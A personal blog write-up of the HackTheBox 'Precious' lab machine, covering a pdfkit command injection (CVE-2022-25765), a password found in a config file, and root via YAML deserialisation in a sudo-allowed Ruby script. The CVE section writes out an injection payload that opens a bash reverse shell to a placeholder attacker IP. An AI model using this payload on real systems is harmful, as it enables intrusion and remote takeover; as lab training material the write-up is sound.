HTB - PRECIOUS

TLDR: CVE-2022-25765 [Command Injection] + Ruby Deserialisation Gadget Chain

Writeup:

== Enumeration ==

Fired up nmap, but found nothing suspecious (just port 22, 80 as ususal for HackTheBox).
Added the IP to '/etc/hosts bound' to 'precious.htb' and visited the WebPage. Seems like a converter for Web Pages to a PDF File through an URL.
Tested it with a http-link to my Website but got following Error:


Picture

== How to get a PDF ==

Okay, it says "remote URL". What about the localhost?
I checked it with ' http://localhost:80/ ' but got the same Error.
Strange isnt it? So I tried various other options to get a pdf, but it always was the Remote-Error or some other Error if the input didnt start with "http(s)".
If this is the right way, how do I get something interesting? So what about fucked up input like the Null-Byte ?
Et voilĂ , ' http://%00 ' downloaded an empty PDF! But I didnt find a way to get some content in it.
Then I took a look at the PDF-Creator trough the Browser Console:


Picture

'pdkit v0.8.6'
Checked the version and found out that it isnt the most up to date!
Scrapping GitHub I saw a few posts about the changes since then and finally found a vulnerability that could be exploitable.



== CVE-2022-25765 ==

This vulernability is about Command Injection as the URL is not properly sanitized.
Found a PoC on snyk's Website. And came up with following Payload: http://example.com/?name=#{'%20`bash -c "/bin/bash -i >& /dev/tcp/[ATTACKER IP]/[PORT] 0>&1"`'}
Spun up a netcat listener and catched a reverse shell!



== User Flag ==

Since pdfkit is written in ruby and the backendservice executed my payload, I operated as "ruby-user" in the reverse shell.
So tinkered for a bit, and found a user called "Henry", but had no rights to read the 'user.txt' at '/home/henry/user.txt'
With ' grep "henry" -r 2>/dev/null ' I found a config-file in ' /home/ruby/.bundle/ ' containing henrys password!
Started a ssh-session as henry and got the user flag.


website

== PrivEsc to root ==

Running linpeas is usually one of my first step during privilege escalation, but even before that I try ' sudo -l '.


website

Henry is allowed to run ' /usr/bin/ruby    /opt/update_dependencies.rb ' as root without a password.
Changed my current working directory to /opt/, looked at the ruby script and ran it!


website
website

Looking at the Error, I came to the conclusion that the script is looking at the current working directory for the 'dependecies.yml' file and in '/opt/' there was no such file.
Henry was not allowed to create or change any files in '/opt/' so i created a 'dependencies.yml' file in '/home/henry/' and wrote "test" to it.
Ran the script again and got an Error back showing the content of my 'dependencies.yml' file!


website

With HTB, the root flag is usually stored in '/root/root.txt'. So I could've run ' ln -s /root/root.txt dependencies.yml ' and read its content by running the script.
However, I wanted root-shell! I cant do shit in ruby, but I know that "FileRead"-Functions can be abused for arbitary command execution in various programming languages. Searching the Internet I found following article:
https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/ . Looked promissing, so I came up with:


website

Afterward running the script once again, I just used 'bash -p' to become root and read the root flag!


website



Thoughts:

Was cool, was cool. Not great tough. Found any spelling or other mistakes? Cool! Keep'em loser...


Post By : Layton


About Myself

#

Layton

Comming Soon I guess
Just a S0l0N00b crushing some easy WebChallenges